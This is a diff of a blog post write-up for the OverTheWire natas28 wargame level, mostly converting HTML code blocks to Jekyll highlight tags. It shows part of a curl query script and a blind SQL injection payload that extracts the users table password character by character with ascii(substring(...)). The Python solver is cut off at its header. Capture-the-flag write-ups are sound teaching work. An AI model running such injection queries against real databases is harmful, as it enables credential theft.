ponderng/Sidequests/_posts/2019-09-26-overthewire-natas-28.md

     -H "User-Agent: curl" \
     -d "query=$query2" )

-echo "Result: $output"</pre>
+echo "Result: $output"
+{% endhighlight %}

 The script takes the SQL query we want and returns the output from &#8220;search.php&#8221;.
 No intermediary steps needed =).

-I then experimented with SQL commands to figure out a way to extract the password, and settled on using <span class="lang:mysql decode:true crayon-inline">&#8216;select * from jokes where ascii(substring((select password from users) from %d for 1))=%d #&#8217; % (i, ord(c))</span> in a loop.
+I then experimented with SQL commands to figure out a way to extract the password, and settled on using `‘select * from jokes where ascii(substring((select password from users) from %d for 1))=%d #’ % (i, ord(c))`in a loop.
 That will test each character one at a time and if we guess it right, then jokes will be sent back in the response, otherwise no joke.

 There&#8217;s just no way you&#8217;re going to want to do this manually, so here&#8217;s my python script for it:

-<pre class="lang:python decode:true">#!/usr/bin/python3.7
+{% highlight python %}
+#!/usr/bin/python3.7
 #
 # main execution script for solving natas28 on OverTheWire.org